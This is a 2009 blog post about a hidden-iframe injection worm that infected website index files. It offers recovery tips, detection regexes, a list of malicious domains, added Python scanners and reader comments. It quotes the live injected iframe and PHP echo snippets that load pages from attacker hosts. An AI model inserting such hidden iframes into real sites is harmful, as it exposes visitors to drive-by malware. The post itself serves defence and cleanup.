[Updated on October 27, 2009 with new a version of the script]
It is a shame that after all those posts about security, some of my websites were under attack today.
Shoban and Anand emailed me about this this morning (thanks guys) and I tried to understand what was going on. To my utter disbelief, more than 10 websites hosted on the same server were affected by the attack.
All the index.* files in the server were infected with a piece of code that loaded a hidden iframe in the page.
To the HTML pages the following piece of code was added:
<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
To PHP pages it added:
echo "<iframe src=\"http://goooogleadsence.biz/?click=8F9DA\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
Asha took the effort and cleaned most of the infected files. We are monitoring the status now.
How did the worm inject the hidden iframes to my files?
There are two ways through which the worm is believed to infect your files:
1) Server is compromised
This is the most common way. One of the other websites on the same web server as yours may have been compromised (or it may be a vulnerability in your own web application), and that led to the web server itself being compromised. Once the server is compromised, the worm spreads to every website on it.
2) Client side FTP
The worm resides on one of the client-side PCs you use to access the FTP or control panel accounts of your hosting server.
When you type in the username and password for the FTP or control panel account, the worm silently reads the credentials, logs into your FTP account and infects the files on the server. It adds the code shown above to all index.* files.
How can I recover from a hidden iframe injection attack?
Here are a few tips that might help you:
- The first thing to do is to change your FTP, control panel and database passwords as soon as possible, and to do it from a machine you know is clean: a new password typed on the infected PC is stolen just like the old one.
- Notify your web host about the attack and advise them to take measures against a possible server-wide attack.
- Tighten the file permissions on your server: pages the web server only needs to read should not be writable by it, and nothing should be group- or world-writable. Keep in mind that an attacker with your FTP password writes as you, so permissions alone do not stop the credential-theft variant.
- Download all your files from the server and check them for infections. Clean the infected files.
- Using good antivirus software, scan and clean every PC you use for logging into your hosting server.
- Never use public computers to access your server.
How do I clean infected files?
Use these regular expressions to search for all pages containing the malicious code and replace every match with an empty string:
<iframe src="http://[^"]*" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
echo "<iframe src=\\"http://[^"\\]*\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";
In the PHP pattern the doubled backslashes match the backslash that escapes each quote inside the PHP string, and the character class also excludes a backslash so the host match stops at the escaped closing quote.
You may have to write a script to automate this for all the files in the server.
I have cooked up a php script that can help you find out the infected files. Download the file from here, save it as clean.php (it is currently clean.php.txt) and upload it to the root folder of your website.
You may want to change some hardcoded values inside the file.
Then visit the url:
http://www.yourdomain.com/clean.php?c=iframe
The parameter c specifies the text to search for inside the file. The results will be something like:
[Screenshot: clean.php output listing an infected file and its occurrence count]
It will search all the files in your website and, if any of the files contains the given string, it will print the filename along with the number of occurrences of the string. In the above screenshot you can see that one file is infected.
Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So as of now you will have to clean the files manually.
Faiz has written an advanced ASP.Net script for finding the infected files, and it can be found here.
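As an added example (not the clean.php from this post, which only reports, and not Faiz's script), here is a Python version of the procedure above: it applies the two patterns from the post across a directory tree, reports infected files with occurrence counts, and can strip the snippets after saving a `.bak` copy of each file. The file-name filter (index, main, home, default) follows what the post and its commenters saw; the backup behaviour is this example's own choice, and the sample inputs are constructed from the snippets quoted above.

```python
"""Find, and optionally strip, the injected hidden iframes.

Added example, not the post's clean.php. It applies the two patterns from
the post (HTML form and PHP echo form), walks a directory tree, reports
infected files with occurrence counts, and with clean=True rewrites each
infected file after saving a .bak copy. The file-name filter and the
backup behaviour are this example's own choices.
"""
import os
import re
import shutil
from typing import Dict, List, Tuple

# The tag added to HTML pages. The host is left open, as in the post's own
# search pattern, so other "?click=" hosts are caught too; the closing tag
# is optional because one sample in the post lacks it. A trailing newline
# is consumed so the cleaned file does not keep an empty line.
IFRAME_HTML = re.compile(
    r'<iframe\s+src="http://[^"]*"\s+width=1\s+height=1\s+'
    r'style="visibility:hidden;position:absolute"\s*>(?:\s*</iframe>)?[ \t]*\r?\n?',
    re.IGNORECASE)

# The echo statement added to PHP pages: the same tag with its quotes
# backslash-escaped inside a PHP double-quoted string, plus the trailing ";".
IFRAME_PHP = re.compile(
    r'echo\s+"<iframe\s+src=\\"http://[^"\\]*\\"\s+width=1\s+height=1\s+'
    r'style=\\"visibility:hidden;position:absolute\\"\s*>(?:\s*</iframe>)?";[ \t]*\r?\n?',
    re.IGNORECASE)

PATTERNS = (IFRAME_PHP, IFRAME_HTML)


def find_injections(text: str) -> List[str]:
    """Return every injected snippet found in text, in file order."""
    found = [(m.start(), m.group(0)) for pat in PATTERNS for m in pat.finditer(text)]
    return [snippet for _, snippet in sorted(found)]


def clean_text(text: str) -> Tuple[str, int]:
    """Remove the injected snippets; return (cleaned text, number removed)."""
    removed = 0
    for pat in PATTERNS:
        text, n = pat.subn("", text)
        removed += n
    return text, removed


def looks_targeted(fname: str) -> bool:
    """File names the worm was seen to hit: index.*, main, home and default pages."""
    base = fname.lower()
    return any(key in base for key in ("index", "main", "home", "default"))


def scan_tree(root: str, clean: bool = False, all_files: bool = False) -> Dict[str, int]:
    """Walk root; return {path: occurrences} for every infected file.

    Only targeted file names are read unless all_files=True. With clean=True
    each infected file is copied to <file>.bak and rewritten without the snippets.
    """
    report: Dict[str, int] = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.endswith(".bak") or not (all_files or looks_targeted(fname)):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                    text = fh.read()
            except OSError:
                continue
            hits = len(find_injections(text))
            if not hits:
                continue
            report[path] = hits
            if clean:
                shutil.copy2(path, path + ".bak")
                cleaned, _ = clean_text(text)
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(cleaned)
    return report


# Constructed sample inputs built from the snippets quoted in the post.
SAMPLE_HTML = (
    '<html><body><h1>Hello</h1>\n'
    '<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 '
    'style="visibility:hidden;position:absolute"></iframe>\n'
    '</body></html>\n')
SAMPLE_PHP = (
    '<?php\n'
    'echo "<h1>Hello</h1>";\n'
    'echo "<iframe src=\\"http://hostverify.net/?click=2730375\\" width=1 height=1 '
    'style=\\"visibility:hidden;position:absolute\\"></iframe>";\n'
    '?>\n')

if __name__ == "__main__":
    import sys
    args = [a for a in sys.argv[1:] if a != "--clean"]
    for path, n in scan_tree(args[0] if args else ".", clean="--clean" in sys.argv).items():
        print(f"{path}: {n} occurrence(s)")
```

Run it without `--clean` first and diff a few of the reported files against their cleaned output (`clean_text`) before letting it rewrite anything; as the post says, automated cleaning can break pages, so the `.bak` copies are your way back.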
Will my search engine rankings be affected by this attack?
Try to be fast with these steps, because if a visitor sees the message "This site may harm your computer" pop up when they try to access your website or blog, they may not return. Remember that if the security of your website is compromised, it can affect the search engine rankings of the website. Besides, it may pave the way for more sophisticated attacks.
Google will mark your site in its search results with the warning: "This site may harm your computer".
Use the following link to see what google thinks about your website (give the url of your site instead of shopfloorbd.co.uk):
http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk
As mentioned above, you must remove the malware from your local machine using antivirus software. AVG detects it as "Trojan Horse Downloader" and NOD32 as "JS/Kryptik.B trojan".
Note that when visiting an infected site, some antivirus software will prompt you that "Trojan Horse Downloader", an exe file, is trying to load. Once the exe infects your machine, it will infect your server too.
Here are some more code samples caught from the wild:
<iframe src="http://hostverify.net/?click=2730375" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="http://hosttracker.net/?click=32431937" width=1 height=1 style="visibility:hidden;position:absolute">
There are obfuscated versions of the attack code too:
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){… etc.
Here is a list of some other websites that host malicious content:
gumblar.cn
martuz.cn
beladen.net
38zu.cn
googleanalytlcs.net
lousecn.cn
fqwerz.cn
d99q.cn
orgsite.info
94.247.2.0
94.247.2.195
http://mmsreader.com
http://google-ana1yticz.com
http://my2.mobilesect.info
http://thedeadpit.com
http://internetcountercheck.com
http://165.194.30.123
http://ruoo.info
gogo2me.net/
http://live-counter.net
http://klinoneshoes.info
protection-livescan.com/
http://webexperience13.com
http://q5x.ru
If you find any of these URLs in the code of your website, that is a sure sign that you are infected.
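Added example, not from the post: a Python scanner that turns the list above (plus the three "?click=" hosts from the code samples and xcount.cc, which a commenter below reports) into a normalised indicator set and reports which lines of which files reference any of them. The normalisation and the host-extraction regex are this example's assumptions; it matches exact host names, so an entry like 94.247.2.0 is treated as a host, not as a network, and the host regex is deliberately loose because the membership test does the filtering.

```python
"""Report files that reference any of the indicator hosts listed in the post.

Added example, not from the post. The host list is taken from the post
(plus the three ?click= hosts in its code samples and xcount.cc, which a
commenter reports). The normalisation and the host-extraction regex are
this example's assumptions; matching is on exact host names.
"""
import os
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Entries exactly as the post gives them: bare hosts, full URLs, IPs.
RAW_INDICATORS = """
goooogleadsence.biz hostverify.net hosttracker.net xcount.cc
gumblar.cn martuz.cn beladen.net 38zu.cn googleanalytlcs.net lousecn.cn
fqwerz.cn d99q.cn orgsite.info 94.247.2.0 94.247.2.195
http://mmsreader.com http://google-ana1yticz.com http://my2.mobilesect.info
http://thedeadpit.com http://internetcountercheck.com http://165.194.30.123
http://ruoo.info gogo2me.net/ http://live-counter.net http://klinoneshoes.info
protection-livescan.com/ http://webexperience13.com http://q5x.ru
"""


def normalise_host(entry: str) -> str:
    """Reduce an indicator or URL to a bare lower-case host (no scheme or path)."""
    entry = entry.strip()
    if "://" not in entry:
        entry = "http://" + entry
    return (urlsplit(entry).hostname or "").lower().rstrip(".")


INDICATORS = {normalise_host(e) for e in RAW_INDICATORS.split()}

# Anything shaped like a host name or dotted IPv4 address, inside a URL or
# bare, so a host that obfuscated code has split out of its URL is still seen.
# Deliberately loose: the membership test against INDICATORS does the filtering.
HOST_RE = re.compile(
    r'(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,}|(?:\d{1,3}\.){3}\d{1,3})(?![\w-])',
    re.IGNORECASE)


def find_indicators(text: str) -> List[Tuple[int, str]]:
    """Return (line number, host) for each indicator host referenced in text."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in HOST_RE.finditer(line):
            host = m.group(1).lower()
            if host in INDICATORS:
                hits.append((lineno, host))
    return hits


def scan_tree_for_indicators(root: str) -> Dict[str, List[Tuple[int, str]]]:
    """Walk root and map every file that references an indicator to its hits."""
    report: Dict[str, List[Tuple[int, str]]] = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_indicators(fh.read())
            except OSError:
                continue
            if hits:
                report[path] = hits
    return report


# Constructed sample: one legitimate line (2) between three infected ones.
SAMPLE = (
    '<script src="http://googleanalytlcs.net/urchin.js"></script>\n'
    '<p>Legitimate: www.google-analytics.com</p>\n'
    'var u = "http://94.247.2.195/in.cgi?3";\n'
    "document.write('<iframe src=\"http://Gumblar.CN/x/\">');\n"
)

if __name__ == "__main__":
    import sys
    for path, hits in scan_tree_for_indicators(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for lineno, host in hits:
            print(f"{path}:{lineno}: {host}")
```

Note the look-alike entries in the list (googleanalytlcs.net, google-ana1yticz.com): a plain substring search for "analytics" would miss them, which is why the scanner compares whole extracted host names rather than searching for fragments.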
[...] suspicious, I googled it. Then I found this post: http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/. I finally knew that the script was added somehow to my files by a virus. Yes, it is my own [...]
Hey, I've made a WordPress plugin that will block (not remove) the script from being executed.
Check it at http://www.nazieb.com/466/blocks-the-annoying-goooogleadsencebiz-iframe/ (beta version).
It’s totally free.
I have had a dozen sites infected, and my experience so far is that:
It targets any file with "index" in the file name. It also targets any file with "main" in the file name. My iframes were pointing to Chinese ads.
@Dave,
I bought your script and it worked, thanks! You saved me a bunch of time trying to write the script myself, well worth every penny.
One modification that I made was to include other sources–I had iframes pulling from 3 different sources rather than just goooogleadsence.biz.
Also, the hackers target, in addition to pages named index, home and default, pages named main, as well as CMS-specific pages like Drupal's maintenance-page.tpl.php and MovableType's php/extlib/smarty/libs/plugins/modifier.default.php.
Hope that helps somebody.
[...] friend Niyaz was bugging me for a while now, asking me to write an asp.net code for removing malicious code from [...]
I guess all of you are using Total Commander with saved passwords? The virus is stealing your saved passwords, nothing else.
hey guys,
I had the same problem on most of my sites on the server. Until I find who's responsible for injecting those iframes, I changed the rights of all index and home pages to r--r--r-- and so far everything seems to be OK.
I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.
Now that I’ve cleared it, attacks have stopped. So you all might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.
Cheers
Akash
I got infected too. I found the tool to remove the infection…
I think it is here
http://www.sulumitsretsambew.org/iframe-worms/
Hi,
Another one hosting malicious code is xcount.cc, which has infected my site.
Hello, my site got infected too by this iframe virus... is there any script that can remove that virus? Thanks.
Thank you very much. My Web site was infected with this worm and following your indications I have been able to eliminate it. THANKS again.
spiderx, that worm removal tool is actually here
http://www.sulumitsretsambew.org/iframe-worms-xtrarobotzcom-superbetfaircn-lotmachinesguidecn/
Thank you very much, I finally removed this thing.
Thanks for the info and the script. Your script is quite useful.
I have had the same issue with this worm, it has been driving me nuts. I currently use FTP Commander to access my site and I have not had a problem since. It only attacks the index.php files and adds the iframe code at the end of the script, and corrupts it. I only seemed to have the issue when I used Internet Explorer to access my FTP folders. You will need to immediately change your FTP password, and use another software package to edit your FTP site other than IE. This has gotten me many times within the last week.
Your clean.php file is a big help on finding these issues. thanks.
@Garrett,
Glad it helped!
[...] http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/ http://blog.tigertech.net/posts/ftp-virus-spreading/ [...]